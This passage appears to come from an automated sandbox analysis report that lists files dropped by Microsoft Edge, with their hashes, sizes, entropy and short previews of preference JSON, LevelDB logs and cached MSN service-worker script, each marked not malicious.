                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14307
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.202386489124765
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JZCm4keYhYojREDj8/pj+FnYQwpvUj1f:sV6LAJu43J4mBdaopUYQw1k
                                                                                                                                                                                                                                                                                  MD5:9256AFBD2DEA8E81D7023E722D3B0AA2
                                                                                                                                                                                                                                                                                  SHA1:C026DB0F267F58CA724AECFBA62D129DB31687F7
                                                                                                                                                                                                                                                                                  SHA-256:923297D81BF2960D2BADFF3DFA2A3D1DE88557F386C21C8D28E92FFEF6CBE4AB
                                                                                                                                                                                                                                                                                  SHA-512:24BEE28D4E3E17752F45F852A1F53130979C18065E3F6B255D4B1A974AAD6BB0158A648995055D9450AB4EF30D973871CC05E7D7F097644B10E0EF54EB98F81E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14307
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.202386489124765
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JZCm4keYhYojREDj8/pj+FnYQwpvUj1f:sV6LAJu43J4mBdaopUYQw1k
                                                                                                                                                                                                                                                                                  MD5:9256AFBD2DEA8E81D7023E722D3B0AA2
                                                                                                                                                                                                                                                                                  SHA1:C026DB0F267F58CA724AECFBA62D129DB31687F7
                                                                                                                                                                                                                                                                                  SHA-256:923297D81BF2960D2BADFF3DFA2A3D1DE88557F386C21C8D28E92FFEF6CBE4AB
                                                                                                                                                                                                                                                                                  SHA-512:24BEE28D4E3E17752F45F852A1F53130979C18065E3F6B255D4B1A974AAD6BB0158A648995055D9450AB4EF30D973871CC05E7D7F097644B10E0EF54EB98F81E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.051821770808046
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                                                                                                                                  MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                                                                                                                                  SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                                                                                                                                  SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                                                                                                                                  SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"preferred_apps":[],"version":1}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):37816
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5558262999486345
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:ppN3CR7pLGLh6kWPg6fTk8F1+UoAYDCx9Tuqh0VfUC9xbog/OVV2WFBrwoVQYDdn:ppN3CHch6kWPg6fTku1jaYTFyoVp4tM
                                                                                                                                                                                                                                                                                  MD5:A8FAAD571000A65A63A9B1ECA77DF33F
                                                                                                                                                                                                                                                                                  SHA1:BF7D384B9BE4050EAE141171C00450EEEAE70412
                                                                                                                                                                                                                                                                                  SHA-256:C83DBEFFB2438B5845A1D93D0C1B2868B9CD87E83AB19B8F1102AC8B50FCB391
                                                                                                                                                                                                                                                                                  SHA-512:E7DCAEFE9AED4DE437B6D5A75721605753575C8A28D0052ED51D2080136FAD7B0E846DC12E034E54F26D12C72BE6AB93AA7624E99F727C8A7C141BF0ABFF2B55
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380417155993821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380417155993821","location":5,"ma
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):37816
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5558262999486345
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:ppN3CR7pLGLh6kWPg6fTk8F1+UoAYDCx9Tuqh0VfUC9xbog/OVV2WFBrwoVQYDdn:ppN3CHch6kWPg6fTku1jaYTFyoVp4tM
                                                                                                                                                                                                                                                                                  MD5:A8FAAD571000A65A63A9B1ECA77DF33F
                                                                                                                                                                                                                                                                                  SHA1:BF7D384B9BE4050EAE141171C00450EEEAE70412
                                                                                                                                                                                                                                                                                  SHA-256:C83DBEFFB2438B5845A1D93D0C1B2868B9CD87E83AB19B8F1102AC8B50FCB391
                                                                                                                                                                                                                                                                                  SHA-512:E7DCAEFE9AED4DE437B6D5A75721605753575C8A28D0052ED51D2080136FAD7B0E846DC12E034E54F26D12C72BE6AB93AA7624E99F727C8A7C141BF0ABFF2B55
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380417155993821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380417155993821","location":5,"ma
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                  MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                  SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                  SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                  SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.158485131378429
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCmjdjL+q2Pwkn23oH+TcwtE/a2ZIFUtfCmjd11Zmw5CmjdjLVkwOwkn23oH+i:7VNovYfYeb8J2FUtfNT1/5NT5JfYeb8l
                                                                                                                                                                                                                                                                                  MD5:4F748F4175077217DC28D0CEFB99A34E
                                                                                                                                                                                                                                                                                  SHA1:21B42DBD585B2ED6E0A9C9C3681D50DD8A893445
                                                                                                                                                                                                                                                                                  SHA-256:44B3134544FC018475099018C4337063D752D6CF9CD9FFBC6EC7FD0CAB0C2424
                                                                                                                                                                                                                                                                                  SHA-512:B05221E42587D7D9DBEA5BAF587C95F2F797B3AD9EB69DC57D75ACDBC71347687DFA23F49FA005E891EE2CABEA0D2EE13CF702BBAE838BB027491074D9C27C6D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:00.993 19a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.2025/01/03-17:33:00.993 19a8 Recovering log #3.2025/01/03-17:33:00.993 19a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.158485131378429
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCmjdjL+q2Pwkn23oH+TcwtE/a2ZIFUtfCmjd11Zmw5CmjdjLVkwOwkn23oH+i:7VNovYfYeb8J2FUtfNT1/5NT5JfYeb8l
                                                                                                                                                                                                                                                                                  MD5:4F748F4175077217DC28D0CEFB99A34E
                                                                                                                                                                                                                                                                                  SHA1:21B42DBD585B2ED6E0A9C9C3681D50DD8A893445
                                                                                                                                                                                                                                                                                  SHA-256:44B3134544FC018475099018C4337063D752D6CF9CD9FFBC6EC7FD0CAB0C2424
                                                                                                                                                                                                                                                                                  SHA-512:B05221E42587D7D9DBEA5BAF587C95F2F797B3AD9EB69DC57D75ACDBC71347687DFA23F49FA005E891EE2CABEA0D2EE13CF702BBAE838BB027491074D9C27C6D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:00.993 19a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.2025/01/03-17:33:00.993 19a8 Recovering log #3.2025/01/03-17:33:00.993 19a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):115371
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.577646507272777
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNtNtC9d411xy:B9LyxPXfOxr1lMe1nL/5L/TXJ6Fu4o
                                                                                                                                                                                                                                                                                  MD5:213C1EE6B14F9B65D840254ECC2567E7
                                                                                                                                                                                                                                                                                  SHA1:8A798028B85EAB64E4183EC30784704C8DFA917B
                                                                                                                                                                                                                                                                                  SHA-256:8CF4033018EEAE133574528674D72D9D9AF95F85E5249A9E5417DD2C63296195
                                                                                                                                                                                                                                                                                  SHA-512:F227BB0C9E3F85778B6ACCB3EB298B217E9D540BB6BED45B052CD6345A95FCEB7913E8E46EAB614A46BA9F407F20304D4EA7F7F0FC9AA9D5FBE6E4503A86E8EC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):189945
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.389834431280335
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:aWnEFSOqtNwN6+w/vylL/0NUp0uimj3YUmMx/y:7NwRwXYL/gSCmcSQ
                                                                                                                                                                                                                                                                                  MD5:F655DA10E682C09C05F8156D4EA1B0BB
                                                                                                                                                                                                                                                                                  SHA1:1E4996674F7C61E7CAFC52928AE4101F5B426605
                                                                                                                                                                                                                                                                                  SHA-256:19879105B3738668FA9D6BE55113A9CF912B22CB60ACE75FCB8C158EF0AFA5C0
                                                                                                                                                                                                                                                                                  SHA-512:D6E84C121E0905AC694444A34FB009862D649906282453236CD59AB530656CEE07BF1E72A324C12884B6D7EA5CBA26A7C1172280A19C7E7BAA0151A9089D2CE6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:0\r..m..........rSG.....0....Lp.................;.......*.........,T.8..`,.....L`.....,T...`......L`......RcR\`.....exports...Rc.1fu....module....Rc.......define....Rb.j......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q...N...{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....pa...,T.`.`z.....L`..........a............a.........Dr8..............
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:0\r..m..................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):48
                                                                                                                                                                                                                                                                                  Entropy (8bit):2.955557653394731
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Zv6c9EjD+n:BqjD+
                                                                                                                                                                                                                                                                                  MD5:DEBEB72CDC85BFE6D4874F9010932305
                                                                                                                                                                                                                                                                                  SHA1:BBD1E04421654BF61A241A666860F0A53E693786
                                                                                                                                                                                                                                                                                  SHA-256:60ABB840B77C4CF471E76DFDF7BFBB3A95552F5E5AC78F0EB6FD3519BC44D6C9
                                                                                                                                                                                                                                                                                  SHA-512:21169D6E4761BF49884F592B539438B46B8E855DF35021E42ABCF3777E3962C0E47669BA995F48EE4B5366C3082E6305B105236AC24F9D0D5080FAF48C54C17A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(...D...oy retne.........................2$$k./.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):48
                                                                                                                                                                                                                                                                                  Entropy (8bit):2.955557653394731
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Zv6c9EjD+n:BqjD+
                                                                                                                                                                                                                                                                                  MD5:DEBEB72CDC85BFE6D4874F9010932305
                                                                                                                                                                                                                                                                                  SHA1:BBD1E04421654BF61A241A666860F0A53E693786
                                                                                                                                                                                                                                                                                  SHA-256:60ABB840B77C4CF471E76DFDF7BFBB3A95552F5E5AC78F0EB6FD3519BC44D6C9
                                                                                                                                                                                                                                                                                  SHA-512:21169D6E4761BF49884F592B539438B46B8E855DF35021E42ABCF3777E3962C0E47669BA995F48EE4B5366C3082E6305B105236AC24F9D0D5080FAF48C54C17A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(...D...oy retne.........................2$$k./.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):5789
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.3933753826913775
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:oG9DU3pel2mVxPmNVJZp4Q9Xp+2qMD+Vijrv86Ll9iSr/1fXwxkvN:omwe9VxPmNVGQ9Xp+2bKiXLLl9iSr/tP
                                                                                                                                                                                                                                                                                  MD5:5126DE680835F8A67585B28D73A353E4
                                                                                                                                                                                                                                                                                  SHA1:329DFB3B65E4B5A49409CC9DB5029F0184A561C7
                                                                                                                                                                                                                                                                                  SHA-256:808E5D0177223D8E27F9CEB06602A401977D5DC6730D74E93681FAE73E78E374
                                                                                                                                                                                                                                                                                  SHA-512:65D8F5F0C5A0EAF16792786B91394139A3B400ABA5AB579A5D7D4732A4C959CBA46889DEEEE85DE26ECACF52E30D577D8655EC944CCBAB4B6C7EFFBEF5BF35E3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f................_..b................next-map-id.1.Cnamespace-cd6ac860_63c4_4768_9539_aedd19fc1290-https://ntp.msn.com/.0.]I.2................map-0-shd_sweeper.){.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.4.c.,.1.s.-.w.p.o.-.p.r.1.-.c.t.t.u.-.c.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.1.s.-.p.2.-.u.s.e.c.m.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.1.s.-.w.t.c.h.-.m.g.3.,.p.r.g.-.c.o.o.k.i.e.c.o.n.t.,.p.r.g.-.c.t.r.-.p.n.p.c.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.-.b.k.n.l.c.,.1.s.-.n.t.f.2.-.i.p.t.l.c.,.1.s.-.p.r.2.-.e.v.l.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):319
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.113639411130633
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCPWTK8Qq2Pwkn23oH+TcwtrQMxIFUtfCPWYCwZZmw5CPWYTzkwOwkn23oH+Tv:7VBG8QvYfYebCFUtfBYX/5BYf5JfYebf
                                                                                                                                                                                                                                                                                  MD5:3B5EB668CAB1BF9E562937E23082D439
                                                                                                                                                                                                                                                                                  SHA1:ADB4D13792FED8DC3308D9EFCF193FC0C767E8A0
                                                                                                                                                                                                                                                                                  SHA-256:5155C216D08EE5480F3488559CC2DA4A41AD12591B08DF27BC95AAB76827E504
                                                                                                                                                                                                                                                                                  SHA-512:28AD5C15A132B48FF95E4F1506965C289027D213DA7D8FC7C9B3DB09B00490563DD66F6EBE55200B5D866F23BD011C8DA062C2C3C1D65EC2FE4EBCAC039EEE2F
                                                                                                                                                                                                                                                                                  Malicious:false
